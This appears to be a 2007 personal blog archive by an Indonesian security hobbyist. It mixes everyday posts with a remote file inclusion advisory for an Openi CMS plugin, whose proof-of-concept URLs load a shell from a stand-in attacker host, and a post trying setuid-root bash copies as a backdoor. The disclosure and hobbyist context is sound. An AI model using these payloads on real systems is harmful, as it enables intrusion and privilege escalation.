Wednesday, February 28, 2007

UbuntuME

4 comments


UbuntuME stands for Ubuntu Muslim Edition. Ubuntu Muslim Edition is a free, open source operating system based on the popular Ubuntu Linux, created by jmehdi. Ubuntu Muslim Edition customize the Ubuntu distro by installing islamic softwares (prayer times, Quran study tool, Arabic learning software etc.) and by changing its "look". You can download the Version 0.1 here

here are the details
Ubuntu Muslim Edition v0.1 (752.3 MB)

Customization:
Splash screen
GDM login + splash
wallpaper + theme
Firefox bookmarks

Softwares:
Plugins: Java 5, codecs (Bad,Ugly), Flash 9
VLC, MPlayer, Ogle
Minbar (prayer times)
Zekr (Quran study tool)


Tuesday, February 27, 2007

Corridor VI

0 comments


It has been for two days that im using trans jakarta as transportation ( i have something to do for a week at "kuningan" ), in the first day (yesterday) i have some long queue up to get in (as i remember, i take a ride on third bus from the time that i stand in the line for queuing up; just imagine how many people "eager" in using it :p ). This was the first time that im using Corridor VI "Ragunan Shelter" which started operation on January 27, 2007 ( first time using this transportation in late 2006, for a trip to "kota" from Blok-m ).

Because of that, me n my friend already plans not to use it again and decide to use our motorcyle for tommorow (which is means this day), but before it (our idea) stick too long in our minds, the bus has taken us to the traffic jam and showing us what will happen if we are using a motorcyle. As u guest, we canceling our idea for tommorow and still using it again coz it takes only 30 minutes to take us (while others are stuck in "crazy" traffic jam ):P.

In the second day (today) we feel that we dont have to spend a lot time in queue, the estimate i make is about the time we go to the shelter is more late than the other days (yesterday), but theres a woman that argue, she said that " merely this because of rain, usually at this time still in a long queue ", of course i`m newly twice in using it, so i cant do some prediction about it :P.

Lets see for tommorow?

** the picture taken in the first day, when we return to Ragunan **

Sunday, February 25, 2007

A holidays of mine

0 comments


This is my holidays (saturday, sunday) homework.

  • (i) there are some un-fit "cyber-cafes" computer that need to recover ;
  • (ii)one full laundry bag that need to be launder

  • wheres the code ?


    Wednesday, February 21, 2007

    Security tools

    8 comments
    If you`re looking for or wondering what is the best security tools ever, then u should check this tremendous sites, Fyodor (as a creator of nmap) start this security tools surveys in 2000, update it in 2003 and release it again in 2006 survey, there is a list of an open source or commercial tools on any platform ( notes: No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list).

    Go check your tools at http://sectools.org, n here are short list of the best 5
  • nessus
  • wireshark, formerly known as Ethereal
  • snort
  • netcat
  • metasploit

  • if u ask me what a best tools for me and always in my "war machine", i choose nmap, dsniff, metasploit (thats the best three for now :) ) , How about you?


    Saturday, February 17, 2007

    Refresh

    8 comments


    Hari ini abis JJS ma dedek n baru sempetin buat nonton d`bijis (minggu sebelumnya kita dah nonton Curse Of The Golden Flower yang di bintangi chow yun fat dan gong li), dan berikut adalah sedikit review pribadi dari gw tentang film ini
  • soal alat yang bernama "d`bijis" itu walau "menyiksa" tapi sepertinya masuk akal :p, just wondering if Candil use it too
  • gary iskak walau "kurang pas sebagai bencong" tetapi cukup menghibur
  • lagu BIP asli ngepas banget di film ini
  • Tora dan Indra masih sulit melepas gaya humor extravaganza mereka
  • Anyway gw ga suka "rianti" nyanyiin lagu BIP, n di akhir cerita band (The bandits) "Glam rock" ini seperti berubah aliran :(
  • Dan kemudian setelah mengantar pulang dedek, gw terpaksa bermacet ria diantara rintik hujan (hiks) ... eh pas balik dah ada titipan CD FreeBSD 5.4 dan 1 buah cd hackin9 live CD terbaru dari kang hero (thx yah kang, mudah mudahan bermanfaat)... gyah. Met weekend all

    updated : ternyata lagunya itu berjudul "kamu nyata" dinyanyikan oleh "Roy Jeconiah" (boomerang) versi rock dan "Izzy" (the titans) untuk versi akustik, sama lagu "tuhan kirim kamu" yang di nyanyiin oleh Abby dan di ciptain oleh Bongky BIP.. hehehe. gw salah :P


    Wednesday, February 14, 2007

    Its Should work, isnt it?

    3 comments
    Let see my environtment,

      

    here are "old kind of backdooring script", that always work for me along time ago,

      

    the idea is just copying root shell to user directory so the user coule execute "root shell" (in this case bash-root), then it should work arent it?

      



    Ok, the file are "hot" and ready to execute with "root" SID

      

    gyahh, WTF .. :P, then i try to copy manually from the root via "terminal window", using "su-" to subtitute as root



    And then i execute that "bash-kopi" as a copy of root shell (/bin/bash)

      

    Gyaaaah for 2nd time :P, Then i change to real-"konsole" by pressing CTRL+ALT+F1, n do the same things,
    root@tarantula:~# cp /bin/bash /home/y3dips/bash-konsole
    root@tarantula:~# chmod 4755 /home/y3dips/bash-konsole
    n then,

      

    Gyaaaaah for 3rd time, .... hueheuheuheuhe :p Tanya Kenapa :lol: ,-


    Tuesday, February 13, 2007

    Bugs hunter vs Programmer

    0 comments
    Sebelum dimulai topik ini, Sejujurnya gw belun nemuin referensi pasti tentang istilah bugs hunter (yang gw temuin malah "bug-hunter - a zoologist who studies insects" ref http://www.thefreedictionary.com/bug-hunter, hehehhe), mungkin dahulu kala sebelum opensource "booming", dan source code hanya untuk kalangan terbatas maka seinget gw pernah ada istilah "Beta tester", nah beta tester inilah yang akan memberi masukan tentang aplikasi tersebut (kemungkinan masih di pakai untuk aplikasi closed source lainnya) dan kemungkinan bisa kita anggap cikal-bakal bug hunters selain istilah "... auditor ... bla bla" :p (CMIIW)

    Topik ini gw bahas karena sudah hampir lebih dari 5 tahun gw bergelut dengan bugs hunting dan lebih kurang 3 tahun untuk serius dalam melakukan "bugs hunting" yang umumnya gw lakukan pada aplikasi opensource (karena dengan melihat source codenya membuat proses ini lebih mudah dan tidak hanya melakukan "blackbox testing"). Seperti yang di tulis anonymous dalam rubrik "pseudo-random" di echo|zine issue 13
    Melonjaknya jumlah vulnerabilities pada tahun 2005 sepertinya terjadi karena banyak ditemukan bugs yang mudah sekali ditemukan pada aplikasi web. Banyak orang menemukan vulnerabilities di dalam aplikasi sederhana -- distribusinya yang kecil dan mudah diinstal, seperti aplikasi guest book, blogging tools (dan juga plugins-nya), dan lain-lain. Saya pikir dengan kemampuan rata-rata (mengerti programming, dan mengenal karakteristik threat tipe aplikasi) seseorang dapat dengan mudah menemukan bugs pada aplikasi-aplikasi tersebut

    Herannya lagi puluhan bahkan ratusan bug (tengok situs milw0rm.com yang tak pernah sepi menerima laporan celah keamanan pada aplikasi (advisory) ) ditemukan dalam hitungan hari, yang ironisnya bug tersebut hampir sama; sebut saja bug "Remote file inclusion" pada aplikasi CMS (content management system) misalkan yang berbasis php, umumnya terjadi karena tidak ada "pemenjaraan variabel" (unsanitized variable) serta kesalahan konfigurasi "engine php" itu sendiri dan dilengkapi oleh "tidak terkendalinya" Opsi dan module pada web server.

    Mungkin secara gamblang seorang programmer memiliki visi "kemudahan" dan "kenyamanan" untuk user, sedangkan bagi seorang "bug-hunter" ini adalah celah yang hampir pasti akan di exploitasi, sebagaimana yang gw tulis pada artikel echo zine issue 13 yang berjudul 0second; meet the bug, disitu secara gamblang gw sebutkan beberapa cara untuk menemukan bug dan "ironisnya" cara itu sudah termasuk usang tetapi "lebih ironis" lagi cara itu masih berlaku sampai sekarang (baca 0day), lalu apakah ada yang salah dengan programmer? Apakah mereka tidak mempelajari bagaimana membuat "kode yang aman?".

    Sebut saja Pendidikan tentang secure programming. Apakah ada? sebenarnya (menurut gw) kebutuhan akan keamanan timbul dari rasa paranoid, (bahkan ada sebuah buku yang berjudul "Only the Paranoid Survive" karangan Andrew Grove. ), Mungkin yang diperlukan adalah meningkatkan level "Security Awareness" para programmer, toh tidak sedikit bacaan di internet yang membahas tentang bagaimana membuat "kode yang aman", berikut link bagus yang gw temukan sewaktu gw melakukan pencarian tentang "secure programming" via search-engine, u may want to check it !.

    Kebetulan, Baru saja gw abis ngebaca salah satu chapter di Stealing the Network How to Own a continent yang berjudul A Real Gullible Genius (bukan sambil nulis gw sambil baca, tapi tulisan ini sudah mengendap 2 hari sebagai draft di blog gw :P ), yang gw rasa bisa memberi suatu perkuatan untuk topik yang gw bahas kali ini, berikut potongan chapternya
    Flir had been most surprised when, as he read the script, he learned that it used non-password-protected ssh public/private keypairs to check in application updates.

    # !/bin/sh
    #
    # Description:
    # This script scp's a CVS sandbox of the SIRAM (my.ptech.edu) application
    # up to the server.
    #
    # Changelog:
    #
    # 2/21/03 - Over the objections of bstrobell, this script uses a non-
    # passphrase-protected ssh key (id_rsa_siram) to authenticate to the
    # server. Frieda requested this after Ben's sick day left her unable to
    # push changes to the server. – bstrobell

    Taken From Stealing The Network; How To Own a Continet; Chapter 4: A Real Gullible Genius (Day 5: Over 20,000 Social Security Numbers) By Jay Beale as "Flir"

    Lihatlah notes pada "source code" yang bertuliskan Over the objections of bstrobell, this script uses a non-passphrase-protected ssh key (id_rsa_siram) to authenticate to the server. Frieda requested this after Ben's sick day left her unable to push changes to the server, dikarenakan salah satu code member (frieda) tidak dapat mengupdate "script" via CVS dikarenakan "pass-phrase" yang dimiliki oleh ben (bstrobell) yang sedang sakit, sehingga untuk "membuat nyaman" maka ben tidak menggunakan "pass phrase" dan hanya menggunakan "key file" yang dalam artikel ini bisa di dapatkan di tempat yang sama. Dan sampai pada pernyataan yang di tulis juga di chapter tersebut;
    "users and systems administrators alike bypassing best security practices in the name of functionality and ease of use" .
    Gw jadi teringat dengan sebuah thread di milis newbie_hacker soal "protes yang dilayangkan seorang member atas "lapisan security" yang harus dilalui untuk menjadi member forum echo" dan sudah secara gamblang gw jelaskan di milis juga, alasan mengapa disebut tidak "nyaman".

    Hayo temen admin berapa kali kasih password di box menggunakan "ASDFGH", atau "QWERTY" ? (hehehhe), atau teman-teman programmer yang menggunakan user "root" untuk user mysql? (without password ?), atau para developer web yang lupa menghancurkan "session"

    Hayo sekarang jadi pertanyaan ini soal "aman" atau "nyaman"?, siapa yang akan menang antara bugs hunter v.s programmer, gw sih lebih milih berada disisi satunya (kiri) ...

    Sunday, February 11, 2007

    [ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion

    2 comments
    Author : Ahmad Muammar W.K (a.k.a) y3dips
    Date Found : February, 11 2007
    Location : Indonesia, Jakarta
    web : http://echo.or.id/adv/adv64-y3dips-2007.txt
    Critical Lvl : Critical
    ------------------------------------------------------------------------------------
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Application : Internal range (site protection), version: 1.0
    Openi CMS plugins (http://www.openi-cms.org)
    URL : http://www.openi-cms.org
    Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip

    Description : With this Plugin you can release page ranges only for certain users. The user
    must authentifizieren itself with user name and password. Several users for
    a page range can be put on. Users and sides which can be protected are put on
    in the editorship environment by the administrator.
    Vulnerability:
    ~~~~~~~~~~~~~~
    Variables "oi_dir" in index.php are not properly sanitized.

    ---------------index.php --------------------
    global $config;
    require_once($config["oi_dir"]."/base/sitemap_classes.php");

    class plg_site_protection extends Plugin {
    ----
    An attacker can exploit this vulnerability with a simple php injection script.

    Poc/Exploit:
    ~~~~~~~~~~~~

    http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php?

    Notes:
    ~~~~~~
    i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file),
    but then u just change the exploit to

    http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?

    it doesnt matter coz the variable still unsanitized.


    Greetz:
    ~~~~~~~
    ana, K-159, the_day, str0ke, waraxe, negative

    Saturday, February 10, 2007

    Usb ext using Utp cat.5

    2 comments



    Yeah, basBang banget yah :p, mungkin bagi temen-temen yang dah lama bermain dengan 802.11x (wireless) serta "antena kaleng" ini adalah hal yang dah Basi, yah mo gimana lagi, abis gw baru sempet sekarang buat cobainnya beneran (kebetulan ada kabel usb dan utp nganggur properti warnet "P) dan Alhamdulillah berhasil di percobaan pertama, tetapi bermasalah dengan "usb device (tanpa power terpisah)" yang memerlukan hantaran "power" yang relatif besar berbanding terbalik dengan jarak kabel.

    Dah sering banget liat kang Onno nampilin gambar beginian di salah satu slidenya disetiap pertemuan, bahkan secara spesifik pernah dia ceritakan waktu gw duduk sebelahan di pesawat sehabis kita mengisi seminar di upn jogja. Well, apa mo di kata sekarang gw sempat dan bisa meluangkan waktu sehabis "mencuci" :p, .. let see what next ? "antena kaleng?, fake AP?" ugh yang jelas install driver DWL-G122 rev B1 dulu di "Arachnids" (server jangkrik) gw yang masih berOS-kan dapper drake.

    Mudah mudahan masih bisa meluangkan waktu lebih banyak lagi setelah mencuci, hehehe

    Thursday, February 08, 2007

    Hand phone = Credit Card

    0 comments
    Gw kutip dari sgate.com sebuah artikel berjudul "Short of cash? Buy it with your cell phone; Payment chip puts impulse purchasing at your fingertips"
    The cell phone is quickly overtaking the functions of a number of everyday tools, including your landline phone, personal computer, MP3 player and television. Next up: your wallet.


    image taken from http://www.necinfrontia.co.jp/


    image taken from http://msnbcmedia.msn.com

    Nah baru semalem neh gw nonton iklannya nokia, di iklannya cewe-cewe yang bebelanja dan akan melakukan pembayaran dapat menggunakan handphonenya. Well, apa yang menarik disini? bagi gw yang telah lama (bukan berarti !jago) menggeluti permasalahan "bluetooth security" dan sedang mendalami masalah "RFID" maka ini menjadi suatu hal yang sangat menantang, cuma permasalahannya belun ada dana untuk belanja hp dan rfid device, hiks .. ada yang mo modalin riset gw ? .. hehehhe, just wait n see how its gonna be ...

    updated
    Ternyata teknologi ini sudah mulai dikembangkan dari tahun 2005, berikut satu buah blog jepang yang mengulas perjalanan m-wallet; http://uptf.blogspot.com/

    Wednesday, February 07, 2007

    Lurking around; Unmotivied

    2 comments
    As its writen in the title, there is no motivation for me to do such "war driving" (since im doing it by huddle-up, i think fair enough if it says "war huddle-up" :lol:) this time, except for doing Access Poit (APs) survey, checking the security levels, also knowing the distance from my place to the APs and trully i found many interesting part in my activity, I also have to to use "wireshark" (new version of ethereal) for "unmotivy" reasons.. (like ive been under intimidating with guns :P)

    According to "war huddle-up" time, ive found that some APs are hiding their SSIDs, which is mean they are aware about security, One APs using "WEP" for encryotion (sorry, i dont crack the key for some purpose, actually im afraid that im goin too far :P ), at last enjoy the skrinsyut



    netstumbler specifically let us knowing the signal strength (or we may say it a distance)



    kismet pushing the devices into monitor mode (make your work easier if u dont know how to set iwconfig [dev] mode monitor :P, so u can match it with sniffing tools )


    then, just harvest the traffic.

    FIN

    Friday, February 02, 2007

    Banjir; motor masuk tol

    0 comments
    Akhirnya gw ngerasain bawa motor di jalan tol pagi tadi, (bukan prestasi yang membanggakan sih, apalagi diatas penderitaan orang lain), awalnya sih gw sewot karena gw pikir ini akibat dibukanya jalur busway (trans-jakarta) yang dah hampir 1 minggu (sejak dia mulai di operasikan) ini membuat gw terpaksa bermacet-macet ria dan menghabiskan 15 menit lebih lama untuk tiba di kantor.

    Gw yang dah sengaja berangkat kekantor walaupun kondisi cuaca antara hujan dan berhenti demi untuk main "futsal" sambil berharap hujan akan reda, ( mudah-mudahan kalo reda tar sore kita bisa main) eh malah mengalami kondisi yang baru kali ini gw alami, gw liat jalan "semrawut" (chaos) motor-motor pada berhamburan ke jalan tol disertai arahan dari pak polisi, mobil-mobil yang memaksa "klaksonnya" untuk bernyanyi di antara rintik hujan melengkapi pagi ini, begitu melewati jalur yang biasanya gw lewati eh gw liat dari jalan tol bahwa jalur itu sudah sekitar 1 meter terendam air beserta rumah lengkap dengan pom bensin. Sekeluar dari tol gw terpaksa menggunakan jalur alternatif sambil harap-harap cemas jikalau jalur yang gw pilih banjir juga dan alhamdulillah, ternyata tidak.

    Sesampai di kantor (lebih lama 1/2 jam), ternyata masih sepi dan banyak rekan yang ga masuk, hum what a day. Mudah mudahan reda hujannya dan "Bencana ini segera berakhir" amin.